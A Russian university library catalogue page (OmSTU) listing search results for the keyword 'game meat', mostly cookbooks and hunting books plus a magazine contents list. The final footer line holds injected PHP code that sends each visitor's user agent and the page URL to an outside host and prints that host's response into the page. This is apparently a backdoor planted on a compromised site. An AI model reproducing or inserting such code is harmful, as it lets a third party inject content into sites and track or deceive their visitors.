Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

50 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Дичь")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 16
1. 
Кулинария [Текст] / сост. Л. В. Кирилинская, 1994. - 324 с.
Держатели документа (Информация об экземплярах) 
2. 
Сидоров В. А. Первичная обработка и заготовка продуктов впрок [Текст] / В. А. Сидоров, 1958. - 151 с.
Держатели документа (Информация об экземплярах) 
3. 
Радость познания [Текст] : популяр. энцикл. в 4 т., пер. с англ. Т. 3 : Наша планета / под ред. Д. А. Тимофеева, 1985. - 245, [3] с.
Держатели документа (Информация об экземплярах) 
4. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
5. 
Богушева, Валентина Ивановна. Технология приготовления пищи [Текст] / В. И. Богушева, 2010. - 374, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии представлен весь комплекс теоретических основ производства продукции общественного питания.

Дана характеристика химического состава и физических свойств различных продуктов. Рассмотрены основные способы и приемы первичной обработки сырья и приготовления полуфабрикатов. Характеризуются приемы тепловой обработки, а также изменения, происходящие в продуктах под влиянием высоких температур.

Основная часть пособия посвящена технологии приготовления кулинарных блюд, правилам их оформления и подачи.

Особое внимание обращается на требования, предъявляемые к качеству продукции общественного питания, срокам ее хранения и реализации.

В последних главах освещаются вопросы лечебного и детского питания, дается характеристика различных диет.

Предназначено для студентов технологических, торгово-экономических, кооперативных колледжей и техникумов. Он может представлять интерес и для практических работников, обучающихся в системе переподготовки кадров и повышения квалификации.

6. 
Вокруг света. - Журнал, 2010г. № 12
Оглавление 
  • Пестрый мир. - с.14-18
  • Яшанова, Екатерина. Невзятая высота / Е. Яшанова. - с.22-25
  • Терещенко, Алексей. 1010 декабрь / А. Терещенко. - с.26
  • Терещенко, Алексей. 1360 декабрь / А. Терещенко. - с.28
  • Терещенко, Алексей. 1860 декабрь / А. Терещенко. - с.30
  • Терещенко, Алексей. 1910 декабрь / А. Терещенко. - с.32
  • Терещенко, Алексей. 1960 декабрь / А. Терещенко. - с.34
  • Почему у пьяного водителя запотевают стекла в машине?. - с.38
  • Какой олимпийский вид спорта самый опасный?. - с.38
  • Почему число пи так называется?. - с.40
  • Почему полумесяц считается символом Ислама?. - с.40
  • Пахомов, Евгений. Холодная война в раю / Е. Пахомов. - с.42
  • Леонов, Сергей. Шариковая ручка Bic / С. Леонов. - с.46
  • Идеи и открытия. - с.48-50
  • Третьяков, Леонид. Акита ину / Л. Третьяков. - с.52-56
  • Петерсон, Елена. Ипподром. Место лошадиной силы / Е. Петерсон. - с.58-62
  • Велехов, Леонид. Куба напротив Кубы / Л. Велехов. - с.66-88
  • Тихомирова, Анна. Театр любви / А. Тихомирова. - с.90-103
  • Арканов, Василий. Обыкновенное поднебесье / В. Арканов. - с.105-116
  • Иноземцев, Владислав. Газовый фронт / В. Иноземцев. - с.118-125
  • Назаретян, Карина. Размузеивание Политеха / К. Назаретян. - с.128-138
  • Нечаев, Сергей. Жан Виктор Моро: непобедимый и проигравший / С. Нечаев. - с.140-150
  • Курукин, Игорь. Ливонская кость в московском горле / И. Курукин. - с.152-162
  • Иванов, Сергей. Родословная мавзолея / С. Иванов. - с.164-166
  • Островский, Андрей. Чужой дедушка / А. Островский. - с.168-178
  • Баюк, Дмитрий. Глубина плоскости / Д. Баюк, А. Сергеев. - с.180-188
  • Воробьев-Обухов, Алексей. Путаю педали / А. Воробьев-Обухов. - с.190-196
  • Кантор, Вадим. Продавцы дождя / В. Кантор. - с.202-210
  • Кротовский, Алексей. Сердечный тоннель / А. Кротовский. - с.212-218
  • Сюткин, Павел. Царская дичь / П. Сюткин, О. Сюткина. - с.222-230
  • Делеринс, Гелия. Священный огонь Поля Бокюза / Г. Делеринс. - с.232-244
  • Сальникова, Алла. Блестящий воспитатель / А. Сальникова. - с.250-258
7. 
Кулинария [Текст] / П. В. Абатуров [и др.] ; дар. В. С. Михайленко, 1955. - 959, [1] с.
Держатели документа (Информация об экземплярах) 
8. 
Кулинария [Текст] / И. Г. Мальчикова, 2013. - 367 с.
Держатели документа (Информация об экземплярах) 
9. 
Анфимова Н. А. Кулинария [Текст] : учеб. для учрежд. нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 1999. - 324 с.
Держатели документа (Информация об экземплярах) 
10. 
Охота на дичь (биологические основы промысла) [Текст] / В. Ф. Гаврин [и др.], 1976. - 174, [1] с.
Держатели документа (Информация об экземплярах) 
11. 
Голубков, Михаил Дмитриевич. Крайняя изба [Текст] : повести, рассказы / Михаил Голубков, 1983. - 268, [2] с.
Оглавление 
  • Даровая дичь
  • Тина
  • Зов
Держатели документа (Информация об экземплярах) 
12. 
Анфимова Н. А. Кулинария [Текст] : Учеб. для учрежд. нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 2002. - 324 с.
Держатели документа (Информация об экземплярах) 
13. 
Экспресс-курс повара [Текст] : учебное пособие / Авт.-сост. В. Полякова, 2002. - 447 с.
Держатели документа (Информация об экземплярах) 
14. 
Анфимова Н. А. Кулинария [Текст] : Учеб. для учреждений нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 1998. - 324 с.
Держатели документа (Информация об экземплярах) 
15. 
Анфимова Н. А. Кулинария [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 2002. - 325 с.
16. 
Гусев, Владимир Гаврилович. Охота с лайкой [Текст] / В. Г. Гусев, 1978. - 102, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2875 - 24.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.80 с.14 запросов, 0.59c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;